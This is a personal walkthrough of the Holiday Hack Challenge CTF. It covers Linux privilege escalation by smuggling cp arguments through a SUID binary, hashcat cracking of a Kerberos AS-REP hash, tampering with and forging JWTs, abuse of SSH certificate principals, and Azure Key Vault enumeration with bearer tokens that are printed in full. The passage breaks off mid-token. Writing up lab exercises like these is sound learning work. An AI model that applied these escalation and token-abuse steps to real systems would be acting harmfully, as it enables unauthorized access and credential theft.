This was my first time completing an entire Holiday Hack Challenge, and it did not disappoint! I enjoyed learning several new tools and techniques along the way. This page is my cumulative writeup for each of the challenges. I’m already looking forward to next year!
Ready Player One Username: SlowMo7ion Colorway: Adorable Manager Head: #3 Mouth: #2 Torso: #8 Legs: #0 Shoes: N/A
The North Pole π Present Maker:
All the presents on this system have been stolen by trolls. Capture trolls by following instructions here and π’s will appear in the green bar below. Run the command “hintme” to receive a hint.
This challenge contains a lot of Linux commands, so we’ll format each question as a comment followed by the corresponding command as the answer in the code block below.
# Perform a directory listing of your home directory to find a troll and retrieve a present!ls
# Now find the troll inside the troll.cat troll_19315479765589239
# Great, now remove the troll in your home directory.rm troll_1931547976558923
# Print the present working directory using a command.pwd# Good job but it looks like another troll hid itself in your home directory. Find the hidden troll!ls -lisa
# Excellent, now find the troll in your command history.cat .bash_history
# Find the troll in your environment variables.env
# Next, head into the workshop.cd workshop
# A troll is hiding in one of the workshop toolboxes. Use "grep" while ignoring case to find which toolbox the troll is in.grep -irw "troll" .
# A troll is blocking the present_engine from starting. Run the present_engine binary to retrieve this troll.chmod +x present_engine
./present_engine
# Trolls have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0.cd ~/workshop/electrical
mv blown_fuse0 fuse0
# Now, make a symbolic link (symlink) named fuse1 that points to fuse0ln -s fuse0 fuse1
# Make a copy of fuse1 named fuse2.cp fuse1 fuse2
# We need to make sure trolls don't come back. Add the characters "TROLL_REPELLENT" into the file fuse2.echo"TROLL_REPELLENT" >> fuse2
# Find the troll somewhere in /opt/troll_den.find -iname "troll*"#iname = case insensitive# Find the file somewhere in /opt/troll_den that is owned by the user troll.find . -user troll
# Find the file created by trolls that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/troll_den.find . -type f -size +108k -size -110k
# View the list of running processes to find another trollps -elf
# The 14516_troll process is listening on a TCP port. Use a command to have the only listening port display to the screen.netstat -antl
# The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last troll.curl 0.0.0.0:54321
# Your final task is to stop the 14516_troll process to collect the remaining presents.kill21318#Congratulations, you caught all the trolls and retrieved all the presents!
This challenge is a penetration test report containing both legitimate and false findings. Our task is to identify and flag the false findings.
False Findings:
The first mistake in the report is in Finding #3: Remote Code Execution via Java Deserialization of Stored Database Objects. The port number 88555/TCP is outside the range of possible ports (1-65535) and therefore not valid.
The second mistake in the report is found in Finding #6: Stored Cross-Site Scripting Vulnerabilities. The executive summary states that this penetration test was performed on externally facing network assets. The report lists a private/RFC-1918 address for the vulnerable server 10.136.168.25.
The third and final mistake in the report is in Finding #9: Internal IP Address Disclosure. The screenshot shows an invalid IP address in the Location header: https://1192.168.112.16/content
With these three findings marked as invalid, the report has now been sanitized and we can submit to complete the challenge!
Help Sparkle Redberry with some Azure command line skills. Find the elf and the terminal on Christmas Island.
When we connect to the terminal, we are prompted to input the az help command and pipe it to (| less) to get started.
azhelp|less
We are presented with the help screen along with another set of instructions: Next, you’ve already been configured with credentials. Use use az and your account to show your current details and make sure to pipe to less (| less)
azaccountshow|less
The previous steps were a nice little warmup. The next instruction asks: Excellent! Now get a list of resource groups in Azure.
A helpful link to Azure Docs | Groups is provided, but let’s use Bing Chat to see if we can speed up the process. Let’s simply ask what command we can use to list resource groups in Azure.
Let’s try the command:
azgroup list
That worked pretty well! On to the next instruction: Ok, now use one of the resource groups to get a list of function apps.
Note: Some of the information returned from this command relates to other cloud assets used by Santa and his elves.
Like before, let’s use Bing Chat to quickly find the command syntax, then use one of our resource groups from the previous output.
azfunctionapplist--resource-groupnorthpole-rg1
We’re moving right along. We may have found some interesting tags related to ssh certs, so let’s note that and keep going. The next instruction asks us to: Find a way to list the only VM in one of the resource groups you have access to.(Note: This is relevant after completing Certificate SSHenanigans!)
We found that northpole-rg2 has access to a vm called NP-VM1. The next instruction asks: Find a way to invoke a run-command against the only Virtual Machine (VM) so you can RunShellScript and get a directory listing to reveal a file on the Azure VM.
In a digital winter wonderland we play,
Where elves and bytes in harmony lay.
This festive terminal is clear and bright,
Escalate privileges, and bring forth the light.
Start in the land of bash, where you reside,
But to win this game, to root you must glide.
Climb the ladder, permissions to seize,
Unravel the mystery, with elegance and ease.
There lies a gift, in the root’s domain,
An executable file to run, the prize you’ll obtain.
The game is won, the challenge complete,
Merry Christmas to all, and to all, a root feat!
Find a method to escalate privileges inside this terminal and then run the binary in /root
We can start by seeing what sudo permissions our user has
sudo -l
We find out real quick that sudo isn’t enabled on this machine, removing a variety of privilege escalation paths we could have explored.
Next, we can try looking for binaries that have the SUID (Set Owner User ID) bit set. This permission allows any user to run a file under the context of the owner. If we can find a file or custom binary owned by root, we may be able to leverage those permissions to get to the /root directory
find / -type f -perm /4000 -ls 2>/dev/null # Find SUID only files
We found something interesting. The simplecopy binary has a unique timestamp property and doesn’t appear to be a common Linux file. Let’s try running it to see what it does.
simplecopy
This appears to ‘simply’ take a file from one location and copy it to another. Since we can run this under the root context, let’s try copying the contents out of /root
simplecopy /root/* /home/elf
We were able to successfully copy the runmetoanswer binary from /root, but the root level permissions still prevent us from running it. We know what the file name is now, but we still can’t run it. Since this machine has limited debugging capabilities, let’s try running strings on simplecopy to see if we can learn more about how it copies files.
strings /usr/bin/simplecopy
simplecopy is using cp under the hood. We might be able to leverage arguments used by cp to modify permissions when copying the file. It took me a few tries, but after some trial and error, I found that we can use double quotes to combine multiple cp arguments into the argument for simplecopy. For example:
In order for us to strip the permissions, we first need to create an empty file, set execute permissions for our user, then copy the contents of the runmetoanswer binary into our file. Here’s a sequence we can follow to start:
Let’s check our work. We now have an empty (0-byte) executable file named runmetoanswer that our user has permissions to run.
Now, let’s try moving the contents of /root/runmetoanswer into our runmetoanswer file using the combined cp arguments concept we discovered above, then check our file properties again.
simplecopy "--copy-contents /root/runmetoanswer" runmetoanswer
ls -lisa #view file permissions (again)
That worked! Notice that the file size has increased. It also matches the original size when we initially copied runmetoanswer without execute permissions. With that obstacle out of our way, let’s try running the binary.
./runmetoanswer
We are closer to the answer, but need to work around permissions of the /etc/runtoanswer.yaml file now. We can apply the same concept as before: Create an empty file, modify permissions, leverage the root user context to copy file contents with simplecopy.
touch runtoanswer.yaml #create another placeholder filechmod 755 runtoanswer.yaml #add rwx permissions for our user#copy contents into our version of runtoanswer.yamlsimplecopy "--copy-contents /etc/runtoanswer.yaml" runtoanswer.yaml
Let’s take a look at what we just copied into runtoanswer.yaml
cat runtoanswer.yaml
We found a potential answer we might be able to use in the future. Now that we have a readable version of runtoanswer.yaml, we need to get it back into /etc so the runmetoanswer binary can reference it. We’ll use simplecopy one last time. The --force and --preserve=all arguments will keep our permissions intact.
In a realm of bytes and digital cheer, The festive season brings a challenge near. Santa’s code has twists that may enthrall, It’s up to you to decode them all.
Hidden deep in the snow is a kerberos token, Its type and form, in whispers, spoken. From reindeers’ leaps to the elfish toast, Might the secret be in an ASREP roast?
hashcat, your reindeer, so spry and true, Will leap through hashes, bringing answers to you. But heed this advice to temper your pace, -w 1 -u 1 --kernel-accel 1 --kernel-loops 1, just in case.
For within this quest, speed isn’t the key, Patience and thought will set the answers free. So include these flags, let your command be slow, And watch as the right solutions begin to show.
Once you’ve cracked it, with joy and glee so raw, Run /bin/runtoanswer, without a flaw. Submit the password for Alabaster Snowball, Only then can you claim the prize, the best of all.
So light up your terminal, with commands so grand, Crack the code, with hashcat in hand! Merry Cracking to each, by the pixelated moon’s light, May your hashes be merry, and your codes so right!
Determine the hash type in hash.txt and perform a wordlist cracking attempt to find which password is correct and submit it to /bin/runtoanswer .*
Using GPT4 with Bing chat, we can quickly determine what hash type this is, the mode we need to use in Hashcat, and a sample command as a starting point.
Let’s make a few modifications to the command. Trying to run it the way Bing suggested still has some errors in this environment. We can use --force to override the warning and continue. Let’s also output our results to cracked.txt
Santa’s elves welcome you to a friendly snowball challenge.
Try and hit as many elves as possible.
Keep in mind, these elves are not mere mortals, they can ‘jot’ about the screen at tremendous speed.
ChatNPT will track your progress.
You will need to score 75 points to win the game.
To support our game chatNPT may advertise at times too.
Click anywhere to begin.
Good luck! Jingle all the way to Geese Islands this holiday!
To get started, we know that we need to score at least 75 hits to win. We also receive a hint referring us to Santa's Magic Cookies to find a way to slow down the elves. I found that when I started recording the game play, the Elves would slow down for a few seconds allowing a few easy hits. They did eventually speed up and I wanted dig into those cookies to try and solve this one, so let’s start by looking there.
Cookies
Upon entering the Game, if we open the developer tools and navigate to the Application tab, we can view the cookies used on this page. It appears that we have a JSON Web Token (JWT)
Based on the documentation, a JWT is split into three parts separated by periods “.” e.g. header.payload.secret. Then they are passed as base-64 encoded strings into the browser.
It looks like we only have two strings in the Value for our JWT. Let’s throw this into Bing chat to see if it can help us out.
We get a nice breakdown of the JWT and the decoded values. We also have insight into a vulnerability with the omission of the secret field. We can take a look at manipulating the "speed" value to test against server-side validation. If it works, we might be able to slow things down to make the game easier. Let’s try setting the speed to -100.
Let’s jump over to CyberChef to encode our payload {"speed":-100}.
Next, let’s update the JWT payload and refresh the page to play again.
As you can see, it is MUCH easier to get hits. We can continue playing the game until we get a score of 75 to win… Or, we can look at the source code to see if we can automatically win without playing.
If we go to the Sources tab in the developer tools, we can inspect the code. In Sources > elfhunt.org/ > elfhunt.org, we can find the code for the game. Drilling down further, we’ll find an interesting variable called vToken with a default value set to False before the game starts. It is also referenced before results are delivered. This may be something we could target.
There is also an interesting update() function that references the session JWT.
We might be able to learn more about this code block and how we might be able to set vToken to true using a JWT. Let’s go ask Bing about it.
We don’t get the clearest response from this prompt, but we have a clue. Let’s try adding the base64-encoding value for{“w”:True} to the JWT. Our complete payload will be: {"speed":-100,"w":true} // (eyJzcGVlZCI6LTEwMCwidyI6dHJ1ZX0). Note: Padding should be omitted for JWTs
Go to Pixel Island and review Alabaster Snowball’s new SSH certificate configuration and Azure Function App. What type of cookie cache is Alabaster planning to implement?
Conversation with Alabaster Snowball:
Hello there! Alabaster Snowball at your service.
I could use your help with my fancy new Azure server at:
ssh-server-vm.santaworkshopgeeseislands.org
ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea!
It even generated ready-to-deploy code for an Azure Function App so elves can request their own certificates. What a timesaver!
I’m a little wary though. I’d appreciate it if you could take a peek and confirm everything’s secure before I deploy this configuration to all the Geese Islands servers.
Generate yourself a certificate and use the monitor account to access the host. See if you can grab my TODO list.
If you haven’t heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently.
Oh, and if you need to peek at the Function App code, there’s a handy Azure REST API endpoint which will give you details about how the Function App is deployed.
It is asking for a public SSH key, let’s generate a key pair for the monitor user from our kali op station. We’ll use an ED25519 key pair because they’re awesome!
ssh-keygen -t ed25519 -C "Monitor User Key" -f monitor
Let’s copy and paste the contents from our monitor.pub key into Alabaster’s app to sign the key.
The output is formatted in json, so we only need to copy the body of the output. Paste the contents into a new file back on op station.
Let’s restrict permissions on our keys before moving forward.
chmod 400 monitor*
Now, we can try authenticating to the server. Since we are using a working directory for this challenge, we’ll need to specify both the private and public keys in our command with -i.
We reached a SatTracker page! Let’s return to a prompt by pressing CTRL+C.
We can begin our initial recon by inspecting user home folders, permissions, configurations, etc. After looking around, we can see a home folder for alabaster that we don’t have access to (yet π).
There are also user authorization principals for monitor and alabaster configured in the system-wide ssh configuration files that may present an opportunity for privilege escalation /etc/ssh/auth_principals. Looking back at the elf principal from when we signed our key on Alabaster’s site, we need to find a way to have the site sign a key with the admin principal.
Let’s enumerate this host further. Since we are authenticated to the server hosting an Azure Function App, we should be able to query the Azure REST APIs with our existing access. Let’s use Bing chat to help generate the syntax.
Perfect! Let’s take the command from Bing and pipe it into jq for a cleaner json output.
This gives us some information about the {resourceGroup}, {subscriptionId}and {vmName}. Let’s generate a Bearer Token so we can authenticate to the API and query specific information about this VM.
Looking through the source for the function_app.py program, there’s an argument that will allow us to pass our own ‘principal’ value and overwrite the default argument on line 45.
45
principal=data.get("principal",DEFAULT_PRINCIPAL)
Let’s use Bing to help us build a POST request with curl
Before we proceed, we need to generate a ssh key pair for Alabaster and copy the public key contents for our POST request.
The newly appointed Geese Islands Communications Captain has been monitoring some off-shore transmissions using the newly installed ‘Just Watch This’ Software Defined Radio (SDR) system. The Captain suspects that a group of miscreants sailing about the islands plan to come ashore and cause trouble. The Captain would like to find their anticipated ‘go-time’ frequency, the planned date and hour for their incursion, and lure the miscreants ashore at a time when the island authorities are sufficiently prepared and ready by transmitting a message announcing a new ‘go-time’ which is four hours earlier than what the miscreants have planned.
Different items in the communications area may be interacted with by clicking on them. Some (but not all) items will show a thin yellow border if they’re interactive. Some items will require AUTHORIZATION with a different ROLE not immediately granted when entering the communications shack. Explore the Captain’s Comms, learn how to use the ‘Just Watch This’ SDR, and use the Captain’s transmitter to send the misleading message with the correct frequency, date, and new time to prevent the miscreants from interrupting everyone’s holiday cheer.
Speak with Chimney Scissorsticks on Steampunk Island about the interesting things the captain is hearing on his new Software Defined Radio. You’ll need to assume the GeeseIslandsSuperChiefCommunicationsOfficer role.
After CLOSELY reading all the documents, we can begin with the assumption that the path of privilege escalation flow through the following roles:
We can start by trying to obtain the rMonitor.tok authentication key to elevate to the radioMonitor user. The documents indicate that this has been insecurely stored on the server. To modify our authentication with JWTs, we can use Burp Suite. Let’s get it set up!
To make things easier to see and troubleshoot in one place, let’s install the JWT Editor into our Burp console.
Go to the Extensions tab within the console.
Select the nested BApp Store tab.
Filter for “JWT”.
Select JWT Editor and Install.
Now we can configure FireFox to proxy traffic through the Burp console by using 127.0.0.1:8080 in Connection Settings > Manual proxy configuration.
Challenge
With our environment ready, We have another clue that tells us: “Access controls are based on the ROLE that is CLAIMed in unique AUTHORIZATION tokens. BEARERS of tokens with different ROLEs are permitted to use the SDR in different ways”.
We can see the GET request is held in our Burp Intercept tab. We need to add an authorization header with our JWT to see the file. Copy and paste the radioUser JWT value from line 3 and insert it into line 8 of the request with the Authorization: Bearer header; then click Forward.
We just found the JWT for the radioMonitor user!
Now we can use the access level of radioMonitor to escalate privileges again. We know the Captain likes to use similar file naming conventions, so let’s see if the structure is the same for other users. With the Burp proxy on, navigate to https://captainscomms.com/jwtDefault/rDecoder.tok.
Using the same technique as before with our intercepted GET request, paste the JWT value for the radioMonitor user the in the Cookie and Authorization headers.
Now we have the JWT for the radioDecoder user!
With our token for radioDecoder ready, start the intercept proxy again and click on the Captian’s SDR (the laptop screen on his desk). Replace the Cookie and Authorization headers with the rDecoder.tok contents.
Our decoder role was able to successfully authenticate to the SDR. We have three sections to decode. We’ll need to stop intercepting in Burp to properly interact with each signal.
CW - This decoded signal shows us a hidden directory value containing the Captain’s private key: TH3CAPSPR1V4T3F0LD3RWe should have have access to both the private and public keys now, we can grab them after decoding each message in the SDR.
NUM - The Audio-Text decoder presents us with an old type of crpytic message from a ’numbers’ station; similar to the Linconlnshire Poacher.
We receive two sets of numbers in this message. Comparing the format with Lincolnshire Poacher broadcasts, these numbers will correspond to a date and time. 12/24 at 1600 hours. (The trailing 9s will be omitted).
FX - The RadioFax decoder sent as an image with the frequency: 10426 Hz.
We have all of the information to mislead the miscreants, now we need to escalate privileges one last time. We have a clue in the Captain’s notes for where he stored the public key. Let’s see if we can find that using the radioDecoder permissions.
Success again! We can save the contents of this file to private.pem
We now have everything we need to generate our own JWT and assume the highest level of access. Let’s use Bard to help us write a Python program we can use to generate a JWT.
We can almost plug and play the code that Bard provided, we just need to insert our payload values.
Our program generates the following JWT under the GeeseIslandsSuperChiefCommunicationsOfficer context, granting the final level of access we need to broadcast our message.
Go to Steampunk Island and help Ribb Bonbowford audit the Azure AD environment. What’s the name of the secret file in the inaccessible folder on the FileShare?
This challenge picks up where Certificate SSHenanigans left off. Let’s log back into the ssh-server-vm with Alabaster’s key.
Alabaster left some impacket tools in his home directory. Those will help us soon, but before we can use them, we need to enumerate the domain and our Azure vm instane further.
Azure AD Enumeration
Using the subscription hosting the Azure Linux VM, we can enumerate the resources with the following command:
curl -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlhdCI6MTcwNDQzOTg1MCwibmJmIjoxNzA0NDM5ODUwLCJleHAiOjE3MDQ1MjY1NTAsImFpbyI6IkUyVmdZT0RlT20zQ2hOclhNWE1lbFQzK09YTjdBZ0E9IiwiYXBwaWQiOiJiODRlMDZkMy1hYmExLTRiY2MtOTYyNi0yZTBkNzZjYmEyY2UiLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC85MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJyaCI6IjAuQUZFQTJvNmprQVpBMVUyU1RHeWxYS3pCVFVaSWYza0F1dGRQdWtQYXdmajJNQlBRQUFBLiIsInN1YiI6IjYwMGEzYmM4LTdlMmMtNDRlNS04YTI3LTE4YzNlYjk2MzA2MCIsInRpZCI6IjkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZCIsInV0aSI6IkxCbHJfOVRsbzBlWGhfTDVjY0oxQmciLCJ2ZXIiOiIxLjAiLCJ4bXNfYXpfcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5Db21wdXRlL3ZpcnR1YWxNYWNoaW5lcy9zc2gtc2VydmVyLXZtIiwieG1zX2NhZSI6IjEiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0Lk1hbmFnZWRJZGVudGl0eS91c2VyQXNzaWduZWRJZGVudGl0aWVzL25vcnRocG9sZS1zc2gtc2VydmVyLWlkZW50aXR5IiwieG1zX3RjZHQiOjE2OTg0MTc1NTd9.vafTrGDxRPkL2k5y80nZsn8l47tGKbBHBLsFzFL00YLAGvE54LmTFXQBAMElveIP8xNpWLbUAhZbYcPIyjL2JGogg7fOVrUc1ZcD_swNRVnpyeljchPHcizfxrYJxL-5_sNzARdmVZ9T8W-dPY1BEc2x9W75PHKJ9pFBvxw9Nmy6G96gHVgpot8myPJ8_fkPUUwZP8SFBYYKgD2fm4MinJHHsLA-utfcLsdoG8gdZweP3v2pd-Vy3uWD21YHuHsMVoJkTNPZ3Y6jfvo8NWwyPQyjZ26WFT50KRnBZFnx202_qqP-xvzbuumoxNKpAZq-Lh44u-Ik_aEz5Bn3w6uc7w"\
-X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resources?api-version=2021-04-01 | jq
Next, we need to see if either vault has access policies. We have some on the northpole-ssh-certs.kv vault. We can use the following command to determine there are permissions for keys, secrets, certificates, and storage.
curl -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlhdCI6MTcwNDQzOTg1MCwibmJmIjoxNzA0NDM5ODUwLCJleHAiOjE3MDQ1MjY1NTAsImFpbyI6IkUyVmdZT0RlT20zQ2hOclhNWE1lbFQzK09YTjdBZ0E9IiwiYXBwaWQiOiJiODRlMDZkMy1hYmExLTRiY2MtOTYyNi0yZTBkNzZjYmEyY2UiLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC85MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJyaCI6IjAuQUZFQTJvNmprQVpBMVUyU1RHeWxYS3pCVFVaSWYza0F1dGRQdWtQYXdmajJNQlBRQUFBLiIsInN1YiI6IjYwMGEzYmM4LTdlMmMtNDRlNS04YTI3LTE4YzNlYjk2MzA2MCIsInRpZCI6IjkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZCIsInV0aSI6IkxCbHJfOVRsbzBlWGhfTDVjY0oxQmciLCJ2ZXIiOiIxLjAiLCJ4bXNfYXpfcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5Db21wdXRlL3ZpcnR1YWxNYWNoaW5lcy9zc2gtc2VydmVyLXZtIiwieG1zX2NhZSI6IjEiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0Lk1hbmFnZWRJZGVudGl0eS91c2VyQXNzaWduZWRJZGVudGl0aWVzL25vcnRocG9sZS1zc2gtc2VydmVyLWlkZW50aXR5IiwieG1zX3RjZHQiOjE2OTg0MTc1NTd9.vafTrGDxRPkL2k5y80nZsn8l47tGKbBHBLsFzFL00YLAGvE54LmTFXQBAMElveIP8xNpWLbUAhZbYcPIyjL2JGogg7fOVrUc1ZcD_swNRVnpyeljchPHcizfxrYJxL-5_sNzARdmVZ9T8W-dPY1BEc2x9W75PHKJ9pFBvxw9Nmy6G96gHVgpot8myPJ8_fkPUUwZP8SFBYYKgD2fm4MinJHHsLA-utfcLsdoG8gdZweP3v2pd-Vy3uWD21YHuHsMVoJkTNPZ3Y6jfvo8NWwyPQyjZ26WFT50KRnBZFnx202_qqP-xvzbuumoxNKpAZq-Lh44u-Ik_aEz5Bn3w6uc7w"\
-X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/northpole-ssh-certs-kv?api-version=2022-07-01 | jq
Now that we know the accessPolicy vault names and types for the northpole-rg1 resource group, let’s write a script to try accessing each name/type combination. If we do have access to any of them, we’ll collect the secret URI for the vault.
Save the contents below into a file and run grab-secretUri.sh
#!/bin/bash
authToken="eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlhdCI6MTcwNDQzOTg1MCwibmJmIjoxNzA0NDM5ODUwLCJleHAiOjE3MDQ1MjY1NTAsImFpbyI6IkUyVmdZT0RlT20zQ2hOclhNWE1lbFQzK09YTjdBZ0E9IiwiYXBwaWQiOiJiODRlMDZkMy1hYmExLTRiY2MtOTYyNi0yZTBkNzZjYmEyY2UiLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC85MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJyaCI6IjAuQUZFQTJvNmprQVpBMVUyU1RHeWxYS3pCVFVaSWYza0F1dGRQdWtQYXdmajJNQlBRQUFBLiIsInN1YiI6IjYwMGEzYmM4LTdlMmMtNDRlNS04YTI3LTE4YzNlYjk2MzA2MCIsInRpZCI6IjkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZCIsInV0aSI6IkxCbHJfOVRsbzBlWGhfTDVjY0oxQmciLCJ2ZXIiOiIxLjAiLCJ4bXNfYXpfcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5Db21wdXRlL3ZpcnR1YWxNYWNoaW5lcy9zc2gtc2VydmVyLXZtIiwieG1zX2NhZSI6IjEiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0Lk1hbmFnZWRJZGVudGl0eS91c2VyQXNzaWduZWRJZGVudGl0aWVzL25vcnRocG9sZS1zc2gtc2VydmVyLWlkZW50aXR5IiwieG1zX3RjZHQiOjE2OTg0MTc1NTd9.vafTrGDxRPkL2k5y80nZsn8l47tGKbBHBLsFzFL00YLAGvE54LmTFXQBAMElveIP8xNpWLbUAhZbYcPIyjL2JGogg7fOVrUc1ZcD_swNRVnpyeljchPHcizfxrYJxL-5_sNzARdmVZ9T8W-dPY1BEc2x9W75PHKJ9pFBvxw9Nmy6G96gHVgpot8myPJ8_fkPUUwZP8SFBYYKgD2fm4MinJHHsLA-utfcLsdoG8gdZweP3v2pd-Vy3uWD21YHuHsMVoJkTNPZ3Y6jfvo8NWwyPQyjZ26WFT50KRnBZFnx202_qqP-xvzbuumoxNKpAZq-Lh44u-Ik_aEz5Bn3w6uc7w"\
vaults=("northpole-it-kv""northpole-ssh-certs.kv")types=('keys''secrets''certifications''storage')for vault in "${vaults[@]}";dofortype in "${types[@]}";dooutput=$(curl -s -H "Authorization: Bearer $authToken" -X GET "https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.KeyVault/vaults/$vault/$type?api-version=2022-07-01"| jq -r '.value[0].properties.secretUriWithVersion' 2>/dev/null)# Check if output is neither null nor an empty string before printingif[ -n "$output"]&&["$output" !="null"];thenecho"$output"fidonedone
It’s not the most elegant solution, but we found access to one of the vaults and the corresponding secret URI. Let’s keep enumerating.
Now we can take the new vault token and try to access the vault resources with the secret URI from above.
curl -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL3ZhdWx0LmF6dXJlLm5ldCIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQ0OTIyOTUsIm5iZiI6MTcwNDQ5MjI5NSwiZXhwIjoxNzA0NTc4OTk1LCJhaW8iOiJFMlZnWUxoeklOQ29UOE5DZGYzZHlnWGFKUnBPQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsIm9pZCI6IjYwMGEzYmM4LTdlMmMtNDRlNS04YTI3LTE4YzNlYjk2MzA2MCIsInJoIjoiMC5BRkVBMm82amtBWkExVTJTVEd5bFhLekJUVG16cU0taWdocEhvOGtQd0w1NlFKUFFBQUEuIiwic3ViIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwidGlkIjoiOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkIiwidXRpIjoiUFdRMnY5OHRyMHlZYkVBY0xVQlRDQSIsInZlciI6IjEuMCIsInhtc19hel9yaWQiOiIvc3Vic2NyaXB0aW9ucy8yYjA5NDJmMy05YmNhLTQ4NGItYTUwOC1hYmRhZTJkYjVlNjQvcmVzb3VyY2Vncm91cHMvbm9ydGhwb2xlLXJnMS9wcm92aWRlcnMvTWljcm9zb2Z0LkNvbXB1dGUvdmlydHVhbE1hY2hpbmVzL3NzaC1zZXJ2ZXItdm0iLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy8y